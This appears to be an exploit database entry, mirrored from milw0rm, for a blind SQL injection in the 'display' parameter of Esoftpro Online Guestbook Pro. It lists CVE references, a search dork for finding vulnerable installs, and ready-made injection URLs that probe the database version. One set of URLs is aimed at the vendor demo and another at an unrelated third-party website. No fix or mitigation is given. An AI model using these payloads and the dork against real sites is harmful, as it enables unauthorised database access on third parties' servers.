[] NeoSense
E X P L O I T S
title author type platform port cve id

Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2009-04-16 
date_updated: 2016-10-27 
verified: 1 
codes: CVE-2010-4996;CVE-2009-4935;OSVDB-66257 
tags: 
aliases:  
screenshot_url:  
application_url: 
Online Guestbook Pro (display) Blind SQL Injection Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php

DorK   : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4





Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

# milw0rm.com [2009-04-17]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.